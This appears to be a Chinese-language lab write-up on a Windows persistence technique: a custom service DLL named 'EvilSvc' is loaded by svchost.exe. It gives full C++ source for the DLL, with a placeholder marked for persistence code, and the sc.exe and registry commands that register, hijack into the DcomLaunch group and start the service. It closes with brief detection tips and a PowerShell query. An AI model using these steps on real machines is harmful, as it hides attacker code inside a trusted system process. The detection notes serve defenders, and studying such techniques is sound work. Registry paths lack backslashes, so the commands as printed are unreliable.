svchost.exe挂载DLL

工作原理

实验过程

vs新建类库编译个处理服务循环响用的DLL

#include "pch.h"
#define SVCNAME TEXT("EvilSvc")


SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE serviceStatusHandle;
HANDLE stopEvent = NULL;


VOID UpdateServiceStatus(DWORD currentState)
{
    serviceStatus.dwCurrentState = currentState;
    SetServiceStatus(serviceStatusHandle, &serviceStatus);
}


DWORD ServiceHandler(DWORD controlCode, DWORD eventType, LPVOID eventData, LPVOID context)
{
    switch (controlCode)
    {
        case SERVICE_CONTROL_STOP:
            serviceStatus.dwCurrentState = SERVICE_STOPPED;
            SetEvent(stopEvent);
            break;
        case SERVICE_CONTROL_SHUTDOWN:
            serviceStatus.dwCurrentState = SERVICE_STOPPED;
            SetEvent(stopEvent);
            break;
        case SERVICE_CONTROL_PAUSE:
            serviceStatus.dwCurrentState = SERVICE_PAUSED;
            break;
        case SERVICE_CONTROL_CONTINUE:
            serviceStatus.dwCurrentState = SERVICE_RUNNING;
            break;
        case SERVICE_CONTROL_INTERROGATE:
            break;
        default:
            break;
    }


    UpdateServiceStatus(SERVICE_RUNNING);


    return NO_ERROR;
}


VOID ExecuteServiceCode()
{
    stopEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
    UpdateServiceStatus(SERVICE_RUNNING);


    // #####################################
    // your persistence code here
    // #####################################


    while (1)
    {
        WaitForSingleObject(stopEvent, INFINITE);
        UpdateServiceStatus(SERVICE_STOPPED);
        return;
    }
}


extern "C" __declspec(dllexport) VOID WINAPI ServiceMain(DWORD argC, LPWSTR * argV)
{
    serviceStatusHandle = RegisterServiceCtrlHandler(SVCNAME, (LPHANDLER_FUNCTION)ServiceHandler);


    serviceStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;
    serviceStatus.dwServiceSpecificExitCode = 0;


    UpdateServiceStatus(SERVICE_START_PENDING);
    ExecuteServiceCode();
}

创建EvilSvc服务

sc.exe create EvilSvc binPath= "c:windowsSystem32svchost.exe -k DcomLaunch" type= share start= auto

修改EvilSvc DLL路径为自己的DLL路径

reg add HKLMSYSTEMCurrentControlSetservicesEvilSvcParameters /v ServiceDll /t REG_EXPAND_SZ /d C:Windowssystem32EvilSvc.dll /f

注册表查看该服务如下

修改svchost组里的DcomLaunch
（添加创建的服务名）

启动EvilSvc服务

sc start EvilSvc

检测技术

* 最近创建的服务svchost.exe作为binPath
* 列出所有系统服务的ServiceDLL值并检测

Get-ItemProperty hklm:SYSTEMControlSet001Services*Parameters | ? { $_.servicedll } | select psparentpath, servicedll

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。